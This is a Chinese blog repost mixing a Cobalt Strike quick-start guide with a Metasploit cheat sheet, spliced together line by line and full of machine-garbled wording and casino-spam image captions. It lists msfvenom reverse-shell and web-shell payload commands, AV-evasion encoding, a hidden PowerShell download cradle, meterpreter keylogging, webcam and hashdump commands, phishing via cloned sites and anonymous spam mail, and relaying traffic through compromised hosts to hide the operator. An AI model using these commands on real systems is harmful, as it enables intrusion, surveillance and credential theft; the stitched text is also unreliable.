原标题:cobalt strike 神速上手 [ 一 ]

转自:https://thief.one/2017/08/01/1/?hmsr=toutiao.io&utm\_medium=toutiao.io&utm\_source=toutiao.io

0x01 关于 Cobalt Strike

明日玩了风度翩翩把内网渗透,当中入眼使用了
metasploit
那款内网渗透神器。metasploit大家料定不目生,笔者也在很早以前就有接触过,但老是重复行使它时都会忘记一些用法,由此为了便利查询本身在本篇记录下metasploit神器的有个别常用命令,以致内网渗透中怎样利用它。
Mac下安装metasploit
mac下安装metasploit比较轻便,官方网站下载pkg安装包,直接设置即可;必要注意的是安装到位后的路径。msfconsole路线:
1

大器晚成款非常优越的后渗透平台 [
什么人用什么人知道,嘿嘿……有可能用的天下无双原因,大概就是广大用法还不曾被本人打通出来,因为不会用,所以,才会认为倒霉用
]

/opt/metasploit-framework/bin

工具基于java,大多数效果与利益在改良的底工上大概相对相比较实用的,极其相符团队间协同应战

该目录下还应该有别的多少个常用的工具:

越来越多详细的情况请自行仿效官方网站,这里就不啰嗦了,以下全体简单的称呼’cs’

澳门金沙在线官网 1

0x02 底子碰着简要介绍:

kali 实际决定端 ip:192.168.1.144

msf的插件路线:
1

ubuntu 16.04 本人公网的vps ip:53.3.3.6

/opt/metasploit-framework/embedded/framework/modules/exploits

win二零一零R2 指标机器 ip:192.168.1.191

msfvenom
功效:生成木马文件,替代开始时代版本的msfpayload和msfencoder。
Options
msfvenom命令行选项如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

centos6.9 已控肉鸡 ip:192.168.1.199

-p, –payload <payload> 钦定要求运用的payload(攻击荷载)
-l, –list [module_type] 列出钦赐模块的具备可用财富,模块类型富含:
payloads, encoders, nops, all
-n, –nopsled <length> 为payload预先钦点二个NOP滑动长度
-f, –format <format> 钦点输出格式 (使用 –help-formats
来得到msf辅助的出口格式列表)
-e, –encoder [encoder] 内定须要使用的encoder(编码器卡塔 尔(英语:State of Qatar)
-a, –arch <architecture> 内定payload的对象框架结构
–platform <platform> 钦点payload的对象平台
-s, –space <length> 设定有效攻击荷载的最大尺寸
-b, –bad-chars <list> 设定规避字符集,举个例子: ‘\x00\xff’
-i, –iterations <count> 钦赐payload的编码次数
-c, –add-code <path> 钦赐多个外加的win32 shellcode文件
-x, –template <path> 钦点二个自定义的可试行文件作为模板
-k, –keep 珍惜模板程序的动作,注入的payload作为贰个新的长河运营
–payload-options 列举payload的科班选项
-o, –out <path> 保存payload
-v, –var-name <name> 钦命三个自定义的变量,以明显输出格式
–shellest 最小化生成payload
-h, –help 查看扶持选择
–help-formats 查看msf扶植的输出格式列表

win7cn 另风度翩翩台肉鸡 ip:192.168.1.123

options
usage
查阅援助的payload列表:
1

0x03 先来快捷预览cs最核心的片段模块具体用处:

msfvenom -l payloads

公司服务器[teamserver]

查阅支持的输出文件类型:
1

第一是为了有助于三个渗透团队内部能够即刻分享全部成员的保有渗透音讯,抓实成员间的沟通同盟,以此抓好渗透作用

msfvenom –help-formats

也正是说,平常状态下四个团伙只须求起贰个团伙服务器就可以,团队中的具有成员只供给拿着自身的cs顾客端登入到组织服务器就会自在完成同台应战

查看扶植的编码方式:(为了达到免杀的功用)
1

自然,实际中或然为了尽量久的维持住指标机器权限,还有恐怕会习贯性的多开多少个集体服务器,幸免现身意外景况

msfvenom -l encoders

其余,团体服务器最棒运转在linux平台上[本次演示所用的组织服务器系统为ubuntu
16.04]

查阅扶植的空字段模块:(为了落成免杀的效能)
1

# ./teamserver 团队服务器ip
设置三个团体服务器密码[外人要用这一个密码能力连步入]
配置文件[貌似私下认可就可以] [YYYY-MM-DD]

msfvenom -l nops

# ./teamserver 53.3.3.6 klion

基础payload
命令格式
1

澳门金沙在线官网 2

msfvenom -p <payload> <payload options> -f <format> -o
<path>

客户端[cobaltstrike]

Linux
1
2
3
4

为了更好的认证效果与利益,此处就分别模拟四个例外的顾客端相同的时间登入到同意气风发台团队服务器中,首先,先在本机运行客商端尝试登录到团队器,顾客端运行现在会提醒您输入团队服务器的ip,端口和密码,客户名可随意

反向连接:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP
Address> LPORT=<Your Port to Connect On> -f elf >
shell.elf
正向连接:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP
Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

# ./cobaltstrike

Windows
1

澳门金沙在线官网 3

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP
Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

进而,再到另大器晚成台kali机器上开发顾客端登录登陆到同一团队服务器,最终落到实处的法力如下,团队成员能够由此event相互沟通,也可通过event清晰看出团队中的其余成员在怎样日子都干了些什么,特别详尽直观:

Mac
1
2

# ./cobaltstrike

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads

澳门金沙在线官网 4

PHP
1
2

澳门金沙在线官网 5

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php
&& pbpaste >> shell.php

行使cs的各个监听器

ASP
1

事实上,监听器的信守比异常粗略,主借使为着承担payload回传的每一种数据,

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP
Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

举个例子,大家的payload在目的机器推行今后,会回连到监听器然后下载推行真正的shellcode代码,其实跟msf中handler的机能为主是同样的

JSP
1

在cs中的监听器有几种,豆蔻梢头种是beacon,另豆蔻梢头种是foreign

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.jsp

foreign
首如果提须求外部使用的一些监听器,譬喻您想使用cs派生四个meterpreter的shell回来,来三翻五次前边的内网渗透,那个时候就选取接受外界监听器

WAR
1
2

再来简单演示下,如何高效创制三个监听器,具体进程如下

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f war > shell.wa
Scripting Payloads

点击左上角的Cobalt Strike菜单

Python
1

-> 选中Listeners

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.py

-> 接着点击Add开关会自行跳出监听器的配置框

Bash
1

-> 设置好端口ip [ 实际中最棒用域名(走dns隧道)
]和payload类型就能够创设,之后,团队服务器会一向监听该端口等待beacon
shell回连的数额

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.sh

澳门金沙在线官网 6

Perl
1

澳门金沙在线官网 7

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.pl

澳门金沙在线官网 8

Linux Based Shellcode
1

说完监听器,最终,大家再来讲payload [攻击载荷]

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP
Address> LPORT=<Your Port to Connect On> -f <language>

说白点儿其实就是个木马下载器,当对象触发payload以往,会活动去下载shellcode[事实上便是beacon
shell的代码]到指标连串中运营,最后成功弹回目的种类的beacon shell,

Windows Based Shellcode
1

至于在beacon
shell推行的命令都是依照布署职责来的,也等于说被控端会按事先明确好的日子自动去调控端下载各样吩咐职务逐大器晚成在目标连串中执行

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP
Address> LPORT=<Your Port to Connect On> -f <language>

先是,大家先来大致制造个payload,然后直接把它丢到对象种类中实践,看看实际的上线效果到底是个怎么着样子,注意,这里带红爪子的是早已得到系统最高权力的,没爪子的中坚都以系统权限一时还非常的低的

Mac Based Shellcode
1
2

澳门金沙在线官网 9

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f <language>
Handlers

澳门金沙在线官网 10

payload加编码
一声令下格式:
1

澳门金沙在线官网 11

msfvenom -p <payload> <payload options> -a <arch>
–platform <platform> -e <encoder option> -i <encoder
times> -b <bad-chars> -n <nopsled> -f <format> -o
<path>

澳门金沙在线官网 12

常用编码:
1
2

0x04 丰盛的客商端攻击选项

x86/shikata_ga_nai
cmd/powershell_base64

先是,尝试使用 ‘System Profiler’
模块,搜罗目的的种种机械和工具消息,比方,指标用的什么样版本的操作系统,什么浏览器,详细版本是微微,有未有装flash,flash具体版本又是稍微[低版本可以挂马],看能否看出指标内网ip段,差不离目测估算下目的内网有多大,有了这个功底音讯之后,中期我们就可以本着的通讯发信,照旧那句话,实际中最佳用域名,因为这里是实验所以才直接用的ip,发信时最棒用html伪装个相比”到位”的链接,关于写信发信又是另三个比较’专门的学业’的技艺点,个人技艺有限,这里暂不涉及,嘿嘿……上边就给我们轻易的看下实际的法力

例子:
1

澳门金沙在线官网 13

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3
-f exe > 1.exe

澳门金沙在线官网 14

自行选购模块
浮动施行总括器payload例子:
1

澳门金沙在线官网 15

msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe

使用’hta
payload’同盟’文件下载’模块向目的发送种种钓鱼链接,首先,创设三个hta的payload,这里的payload权且只帮衬三种可实践格式,exe,powershell和vba(宏),实际中更推荐用powershell,成功率相对较高,好处就少之甚少说了,免杀,灵活…

payload的坑
好端端状态下,利用msfvenom生成的木Marvin件,可直接上传到对象服务器上运营(加权限卡塔 尔(阿拉伯语:قطر‎。但本人本人碰着过八个坑,生成的文本内容有后生可畏都部队分是行不通的,会挑起报错,如下图所示。

澳门金沙在线官网 16

澳门金沙在线官网 17

澳门金沙在线官网 18

澳门金沙在线官网 19

澳门金沙在线官网 20

澳门金沙在线官网 21

缓和方案是vim文件,删除文件开首两行还是不行的开始和结果。
msfconsole
成效:用来在指令行下运行metasploit。

澳门金沙在线官网 22

澳门金沙在线官网 23

澳门金沙在线官网 24

运转后可看出metasploit当前版本,以致种种模块的插件数量。
auxiliary扫描模块
exploits漏洞使用模块
payloads
encoders编码模块
nops空字符模块

澳门金沙在线官网 25

search搜索模块
比如搜索ms15_034尾巴的选择插件
1

生成基于各式语言的shellcode,如,c,c#,java,python,powershell,ruby,raw,其它,cs也提供了可直接配合veil一齐利用的选项,这里依然以最实用的powershell为例,生成好以往,想艺术把脚本载入到指标类别中,这里就直接在对象cmd中载入了,实际中您能够把那个代码单独扣出来放到任何能试行ps的地点

search ms15_034

# powershell –exec bypass –Command “& {Import-Module ‘C:payload.ps1’}”

澳门金沙在线官网 26

澳门金沙在线官网 27

澳门金沙在线官网 28

澳门金沙在线官网 29

同盟木马弹Shell
前方作者介绍了怎么着采纳msfvenom生成木马文件,这里自身介绍如何使用msf连接上被奉行的木马文件,到达调控指标服务器。
常用payload
先是大家想起一下生成木Marvin件的下令,当中有三个payload的选项,常用的多少个payload。linux相关payload:
1
2
3
4
5
6

尝试选取office宏钓鱼,并不引进直接那样搞,因为office暗中同意是不启用宏的,可是,能够品尝同盟使用部分早已爆出来的周旋比较新office
0day来搞,注意平日和睦用office一定要禁止使用无数字签证的宏,切莫相信vba

linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp

澳门金沙在线官网 30

windows相关payload:
1
2
3
4
5
6
7
8

澳门金沙在线官网 31

windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

澳门金沙在线官网 32

小心:含有x陆拾壹只适用对象服务器为60个人操作系统的,没有x64或许选用x86的只适用三11个人操作系统;含有meterpreter的模块会反弹meterpreter_shell,而普通的shell模块只会反弹普通的shell(反弹结果跟nc相通卡塔 尔(阿拉伯语:قطر‎;reverse_tcp代表木皇家赛马会主动连接目的服务器,bind_tcp代表木马会监听本地的端口,等待攻击者连接。由此生成的木马文件,要基于具体情形而定。
payload选择
前方介绍了常用的payload,那么payload选用的三大体素如下:
木马连接的动向
目的操作系统及版本
反弹的shell类型

澳门金沙在线官网 33

木马连接方向:msf木马分为正向连接与反向连接,正向连接相符攻击机能给连接指标机的事态,反向连接使用对象意义连接攻击机的境况,这里所说的连年日常是指tcp的有个别端口。由此在生成木马前,供给先剖断当前条件,契合正向连接木马依然反向连接的木马。(可以动用nc工具测验,详细参谋:【渗透神器系列】nc)
目的操作系统类型查看:那几个隐私了!操作系统位数查看:
1

澳门金沙在线官网 34

getconf LONG_BIT

澳门金沙在线官网 35

反弹shell类型:那么些至关心重视要在于反弹的shell的用处,日常施行系统命令的话普通操作系统的shell就够了。借使想要使用高等效能,比如:键盘记录,开启录像头,增多路由等功效,能够动用meterpreter_shell。
连天木马
开启msf,启用exploit/multi/handler模块。
1
2
3
4
5
6

品尝向健康的exe中放到payload,可是,捆绑完之后的exeLogo恐怕会被校订,你可以尝尝把本来的putty.exe的Logo给扣出来,然后再更换下,好好管理下免杀,之后难题着力就不太大了,从下图能够清楚地来看,当正常的程序奉行完未来,大家的payload也风华正茂并被实践了[其实payload是先进行的]

use exploit/multi/handler
set payload linux/x86/meterpreter/bind_tcp
show options
set RHOST 10.0.0.1
set LPORT 12345
exploit

澳门金沙在线官网 36

澳门金沙在线官网 37

澳门金沙在线官网 38

澳门金沙在线官网 39

澳门金沙在线官网 40

小心:这里set的payload跟生成木马使用的payload要后生可畏律,别的的参数依照采用的payload而填充。
meterpreter
shell
当大家获得对象服务器的meterpreter_shell后,能够张开过多操作。
1
2
3

澳门金沙在线官网 41

backgroud 将msf进度放到后台
session -i 1 将经过拖回前台运维
run vnc 远程桌面的敞开

更改古板的usb自运维payload,你须要提供二个payload[这些能够直接用cs生成,可是不免杀,最棒依然用你自个儿管理好的马来搞]就能够,官方说,对xp在此以前的系统最佳使,win7未来的种类大旨废掉了,实用性并超小,所以那边也就不详细说了

文件管理作用:
1
2
3
4
5
6
7
8

澳门金沙在线官网 42

Download 下载文件
Edit 编辑
cat 查看
mkdir 创建
mv 移动
rm 删除
upload 上传
rmdir 删除文件夹

至于生成常规的exe
payload就比较轻巧了,钦定下要挂到哪个监听器上,然后给个命中率比较高的名字保存一下,把转换的可试行文件想方法丢到对象机器上奉行下,特简单,这里就没有多少啰嗦了

互联网及系统操作:
1
2
3
4
5
6
7
8
9
10
11

澳门金沙在线官网 43

Arp 看ARP缓冲表
Ifconfig IP地址网卡
Getproxy 获代替理
Netstat 查看端口链接
Kill 甘休进度
Ps 查看进度
Reboot 重启Computer
Reg 改良注册表
Shell 获取shell
Shutdown 关闭Computer
sysinfo 获取Computer音信

仿造目的网址针对挂马,提供叁个你想克隆的网址,然后配好温馨的url[宪章的玩命跟目的的像一些],然后带上你要推行的payload,这里的payload能够直接用msf生成,也得以像自己如此用hta,当然啦,实际中这几个payload确定是紧凑管理过的,时机谭何轻便,料定不会乱搞,还是这句话实际写信最佳用html方便把非常url给管理的更逼真

客商操作和别的功效解说:
1
2
3
4
5
6
7
8
9
10
11

澳门金沙在线官网 44

enumdesktops 客户登入数
keyscan_dump   键盘记录-下载
keyscan_start  键盘记录 - 开头
keyscan_stop   键盘记录 - 结束
Uictl      获取键盘鼠标调节权
record_mic    音频摄像
webcam_chat   查看录制头接口
webcam_list   查看摄像头列表
webcam_stream  录制头录制获取
Getsystem    获取高权力
Hashdump    下载HASH

澳门金沙在线官网 45

meterpreter增加路由
大约时候我们获得到的meterpreter
shell处于内网,而大家须要代理到对象内网情状中,扫描其内网服务器。当时可以运用route功用,增多一条通往目的服务器内网的路由。
翻看shell互联网情形:
1

澳门金沙在线官网 46

meterpreter>run get_local_subnets

澳门金沙在线官网 47

增加一条通往指标服务器内网的路由
1

‘PowerShell Web
Delivery’可能也是豪门平时用的最多的效能模块了,其实,它就相当于msf中的web_delivery模块,会生成大器晚成段shellcode代码,然后会提要求你三个下载器,那样您就足以把这么些下载器插到其余能运维powershell且能符合规律上网之处,譬如,规范的
chm,快捷情势……,因为只是尝试,笔者就直接丢到对象类其余cmd中实施了

meterpreter>run autoroute -s 100.0.0.0/8 (依照目的内网互连网而定)

澳门金沙在线官网 48

查看路由设置:
1

澳门金沙在线官网 49

meterpreter>run autoroute –p

澳门金沙在线官网 50

诚如的话,在meterpreter中设置路由便足以高达通往其内网的目标。可是稍稍时候还是会倒闭,这时候大家得以background再次回到msf>,查看下外侧的路由景况。
1

澳门金沙在线官网 51

澳门金沙在线官网,route print

发垃圾邮件,先把具有的对象邮箱放到贰个文件中[留意,每行对应贰个],然后再去找个备选择来钓鱼的邮件[平素查看最早的作品,把html整个粘出来],写完信今后记得先预览下,看看实效,然后再配备好用来发送邮件的公物邮件服务器,这里本来想用protonmail邮箱服务器来发的,后来见到官方说因为加密的由来暂不帮忙常规的IMAP,POP3,SMTP,万般无奈,这里就先不演示了,特别轻松,实际不知情也得以私信小编……,别的,实际中山大学家最棒用手中原来就有的各类无名氏邮箱来发[左右只要不败露风声私人音信会轻松被人追踪到的信箱都足以],那非常重视……切记,图貌似给贴错了,汗……咱们懂笔者意思就能够

假设开采未有路由新闻,表明meterpreter
shell设置的路由并从未奏效,大家得以在msf中加多路由。
1

澳门金沙在线官网 52

msf>route add 10.0.0.0 255.0.0.0 1

澳门金沙在线官网 53

声明:1意味着session
1,攻击机假如要去拜望10.0.0.0/8网段的能源,其下后生可畏跳是session1,至于怎么是下一条这里十分的少说了,反正正是日前攻击机能够访问内网能源了。
meterpreter端口转载
若是近些日子大家扫描到了10网段的某部ip存在mysql弱口令,账号密码都有了,那么我们可以在肉鸡服务器上登陆指标服务器mysql。当然,假如小编想在攻击机上去登入mysql,能够使用端口转载。(某个情形下,内网的机械也不可能互相ssh,要求登录壁垒机卡塔尔国
在meterpreter shell中输入:
1

常规java攻击,有版本节制,何况要买证书,实际渗透中,其实后边那些基本就早就足足了,所以这里就不首要说了

meterpreter > portfwd add -l 55555 -r 10.0.0.1 -p 3306

0x05
通过地方那些措施,相信那时的您曾经搞到了三个beacon的shell,上边我们就来详细表达有关beacon
shell本身的中央使用[后渗漏阶段],先假使我们获得的是一个还一直不bypass掉uac早先的’管理员’权限的beacon
shell,以此来开展再三再四的部分基本操作,必要事先说Bellamy(Bellamy卡塔尔国下cs对中文的支撑并糟糕,要是目的是中国语言管艺术学系统,有乱码是必定的

代表将10.0.0.1服务器上的3306端口转载到本地的55555端口,然后我们得以在该地运维mysql
–h 127.0.0.1 –u root –P 55555 –p
去登入mysql。别的端口如ssh、ftp等都好像,那一个历程跟msf代理很像。
互联网上有关metasploit用法的材质非常多,这里重要记录一些常用用法,以至民用利用进度中的一些坑
参照小说:http://www.freebuf.com/sectool/72135.htmlhttp://blog.csdn.net/lzhd24/article/details/50664342http://blog.csdn.net/qq\_34457594/article/details/52756458http://www.freebuf.com/sectool/56432.htmlhttp://www.freebuf.com/articles/network/125278.html
传送门
【渗透神器系列】DNS音信查询【渗透神器体系】nc【渗透神器连串】nmap【渗透神器种类】Fiddler【渗透神器种类】寻找引擎【渗透神器连串】WireShark

help 查看beacon
shell全体内置命令支持,假若想查看钦定命令的用法,能够这么,eg: help checkin

note 给当前目录机器起个名字, eg: note beacon-shell

cd在目的体系中切换目录,注意在win系统中切换目录要用双反斜杠,大概直接用’/’
eg: cd c:

mkdir 新建目录, eg: mkdir d:beacon

rm 删除文件或目录, eg: rm d:beacon

upload 上传文件到指标类别中

download从目的连串下载钦命文件,eg: download
C:Userswin7cnDesktopputty.exe

cancel撤销下载职务,比方,一个文件假如特意大,下载恐怕会丰裕耗费时间,假若中途你不想世襲下了,就能够用这些撤废一下

shell在对象种类中施行钦定的cmd命令, eg: shell whoami

getuid 查看当前beacon
会话在对象种类中的客商权限,大概需求bypassuac或许提权

pwd查看当前在目录系统中的路线

ls列出当前目录下的富有文件和目录

drives列表出目标种类的有所分区[win中叫盘符]

ps查看目标种类当下的具有的进度列表

kill杀掉钦定进度, eg: kill 4653

sleep
10钦定被控端休眠时间,私下认可60秒二回回传,让被控端每10秒来下载三次任务,实际中频率不宜过快,轻易被发觉,80左右一回就可以

jobs列出富有的职分列表,有个别职责试行时间也有一些较长,那时候就能够从职责列表中看看其所对应的具体职务id,指向性的杀绝

jobkill若是开采义务不知是何原因长日子尚无实行恐怕特别,可尝试用此命令直接甘休该职务,
eg: jobkill 1345

clear解除beacon内部的任务队列

checkin强制让被控端回连二次

exit 终止当前beacon 会话

ctrl + k 清屏

0x06
搜罗指标机器上的各个音讯[稍许恐怕会触发敏感api招致防护报告急方,其余进程注入,被控端大概感到十二分显眼的卡顿,工具也可以有过多不完备的地点]:

在目的类别中放置常规键盘记录, eg: keylogger 1796 x86

澳门金沙在线官网 54

尝试在目的种类中截屏,只怕会招致目的种类有很明白的卡顿,eg: screenshot
1796 x86 10 截取10秒

澳门金沙在线官网 55

应用web代理,劫持转载指标浏览器进度数据到钦赐的端口上,然后大家再从该端口访谈,就一定于拿着对象的浏览器中的数据访谈

比方,大家经过截屏发掘她登陆某些须要账号密码的站点,通过浏览器代理笔者就足以兑现无密码间接登入他所登陆的特别站点,小编表明本事倒霉,相信我们应该都懂作者意思

法定说有时只对IE好使,何况还不平稳,成功率十分之五四分之二吧,推测是dump进度数据的缘由,dump刹那间或然会招致指标浏览器巨卡

可是不能不说那些主张还是不行好的,只是功效近日做的 [
这里敬拜下笔者,大写的赞] ,还不是专程完备,日暮途穷的情景下能够品尝下

browserpivot 1460 x86

browserpivot stop

澳门金沙在线官网 56

澳门金沙在线官网 57

澳门金沙在线官网 58

澳门金沙在线官网 59

域内渗透相关模块,其实,假诺真是域内渗透,我们能够权且不要这么搞,后续再单独说

kerberos_ccache_use 从ccache文件中程导弹入票据

kerberos_ticket_purge 消灭当前shell的票子

kerberos_ticket_use 从ticket文件中程导弹入票据

0x07
通过各个powershell渗透框架来抓实cs的实用性,如,nishang,empire,PowerSploit,powerup,Sherlock……续的,提权,bypassuac,dll注入,抓hash,pth……都是大同小异的用法,主旨照旧在那三个脚本上,关于各样powershell框架的具体用法,请关心博客相关作品,这里就不豆蔻梢头风流倜傥演示了,就大约说一下用法,当然,beacon
shell自个儿也提供了肖似的效益,只是自己还未有说,但实质上中极度恐怕还贫乏,并且它自身的工具专业的亦非极度好,所以更推荐大家进一层是在win内网渗透中,尽只怕整体用powershell来搞

第一种艺术,在beacon shell中程导弹入外界ps脚本到长途机器上

powershell-import /root/Desktop/Get-Information.ps1

powershell Get-Information

澳门金沙在线官网 60

第二种艺术,在beacon shell中向来实行powershell代码

powerpick Get-Host

澳门金沙在线官网 61

0x08 利用cs灵活穿透指标内网

对目的机器所在的内网进行常规端口扫描,钦命ip段,钦命用于扫描的情商[暂只帮忙arp,icmp,tcp],钦命线程[深深记住实际中实际不是开的太高]

portscan 192.168.1.0/24 1-6000 arp 10

澳门金沙在线官网 62

becon
shell内置的端口转载作用,把本机的某部端口转到公网只怕内网钦赐机器的有些端口上,实际用的时候速度确实非常慢,何况常常断……原因暂未知

rportfwd 389 192.168.1.181 3389

rportfwd stop 389

澳门金沙在线官网 63

澳门金沙在线官网 64

让cs和msf相互间联合浮动选取,在目的机器上开启socks4a代理,方便进一步的内网渗透

先是种,利用各样socks代理顾客端直接把各样渗漏工具带进目的内网

beacon> socks 1234

澳门金沙在线官网 65

# vi /etc/proxychains.conf

socks4 53.3.3.6 1234

# socks stop

澳门金沙在线官网 66

其次种,直接运用隧道直接把全体msf带进目的内网

setg Proxies socks4:53.3.3.6:1234

澳门金沙在线官网 67

澳门金沙在线官网 68

动用beacon shell连接内网中的linux机器

ssh 192.168.1.199:22 root admin

澳门金沙在线官网 69

通过beacon隧道直接派生贰个meterpreter的shell[非vps上做转账,直接通过beacon隧道过来],流程很简短,首先,在集体服务器上做端口转发,然后创造一个表面监听器,端口和ip写beacon
shell的机器所在的ip,然后在对应的beacon
shell中’spawn’选中刚刚成立好的外界监听器,一时半刻还恐怕有个别难题并未有很好的化解,前边单独说

至于何以采用msf弹回三个beacon
shell的章程就那多少个了,最简易的措施正是直接推行下beacon的payload的代码就足以了,又忘贴图了,汗……中期再补上来吧

0x09 同盟常规端口转载尽恐怕隐蔽本身的集体服务器

有的时候为了混淆是非,制止被人家赶快溯源到,可能会在中间加一些跳板来尽量隐瞒我们实际的团体服务器地方,如何做吗,其实很简短

说白点正是做端口转载[又名重定向],当然啦,这些端口转载分明是在和睦已部分肉鸡上做[论佚名的重要]

若是您实际不放心,也能够尝试同时在多少个肉鸡上,做多元转载[也等于多加几层跳板],以此来吸引对方,加大对手的本源难度,这是其大器晚成

还应该有个别指标内网中的有个别机器是迫王丽萍常直连公网的,只可以内网机器间相互访谈,但我们照旧想让那台不可能上网的机械也能符合规律上线

那将要动用我们立即要说的端口转发,至于具体用哪些工具自然就老好多了,可是,依然引进大家首荐一些种类自带工具来搞,例如,netsh,iptables,socat之流……

这样,你好,我也好 ^_^

下边就用socat来轻便演示下怎么着尽恐怕隐蔽自身的组织服务器,关于内网断网机器上线也是大同小异的道理,大家可自行尝试

先是,到kali中用cs顾客端登到大家的团体服务器,制造一个健康80端口的监听器,这里的回连ip暂且直接用vps所在的安分守己ip[实质上中尽量用域名,很首要],如下

澳门金沙在线官网 70

澳门金沙在线官网 71

随后,就足以ssh到肉鸡上用socat最早做转账了,上面那句话的意思便是今后自外界的80端口上的流量转到公网vps的80端口上,之后肉鸡本地的80端口会一向处在监听状态,只要80端口风姿罗曼蒂克有流量经过就能自行转接到vps的80端口,而vps的80端口又恰巧是我们的监听器端口,那意味,相信你懂的

# socat tcp-listen:80,reuseaddr,fork tcp:53.3.3.6:80 &

澳门金沙在线官网 72

那儿,回到cs顾客端随便创建一个powershell
payload,注意,正如大家前面所说,那只是个powershell下载器,首要担任下载真正的shellcode代码,必要求记得把前面包车型地铁ip要改成肉鸡的ip[因为笔者这边是效仿的肉鸡,所以才是个内网ip,实际中必然是个公网ip只怕域名],因为大家最终的指标是经过肉鸡帮大家转发到大家的确的共青团和少先队服务器上去,以此来到达尽量掩盖的指标

瞩目这里,默许生成之后,它是我们本人组织服务器剖析的相当域名,实际中不可否认要手动把它改成肉鸡的域名或ip,那样,当下载访问一定会将首先会拜候到肉鸡,而笔者辈曾经在肉鸡做了倒车,所以最终如故会落得大家的集体服务器成功下载到shellcode代码,作者个垃圾,竟然连码都没打全,算了,反正vps立时也快到期了,打游击打习贯了,嘿嘿……^_^

# powershell.exe -nop -w hidden -c “IEX ((new-object
net.webclient).downloadstring(”))”

澳门金沙在线官网 73

澳门金沙在线官网 74

澳门金沙在线官网 75

澳门金沙在线官网 76

终极,我们看来指标平常上线,至于,怎么让对象内网中不可能不荒谬连网的机器也能平日上线都以千篇一律的道理,你能够把payload回连的流量弹到内网中任何大器晚成台能够寻常上网的机械上,然后再去这台机械上把弹过来的流量转到大家团队服务器上,那样就可以直达让内网中不能够上网的机械也同等健康上线

0x10 深切理解dns隧道通讯以至smb
beacon通讯进度,那或许是整个工具最中央之处之大器晚成,后续会用大量的篇幅单独说

0x11
至于牛逼的告知生成功用这里就背着了吧,扶助大器晚成键导出pdf,实际渗透进度中的全部操作记录数据总体都被保存在钦赐的目录中,我们有意思味可机关钻研,比较轻易,毕竟不是大家那边的要害,就没有多少啰嗦了

好几总括:

世家也来看了,关于工具自己使用特别轻巧,纯图形化操作,稍稍有些底蕴,异常快就会上手,何况它直接援助图标灵活拖拽,很有益于对点名肉鸡举行集中批量操作,特别和谐,实际少校msf和cs合作起来举办内网渗透,无疑一时也是极好的,真正的难题还在于对分裂协商的beacon
shell通讯进程的知道,这也是个体以为全数工具最昂贵的地点,说真话,关于其内部的通讯细节相当多主题素材现今仍压抑着本身,平素都觉着cs本人正是风度翩翩款特别完美的上学样板,里面有太多值得深挖沉淀的东西,只是苦于有好些个东西,并不是一位所能完毕,相信也大家跟自个儿同生龙活虎,绝不会仅仅知足于工具基本选取上,其实内心都很了然,那样基本是不会有啥实质性的前行的,时间不多,容不得浪费,所以也要命期待跟我们齐声深远调换……对了,cs
3.8也后生可畏度出去了黄金年代段时间了,想尝鲜的相爱的人可以去探究,延长试用期依旧老办法…

作品出处:klion’s blog

初藳链接:)

网编:

相关文章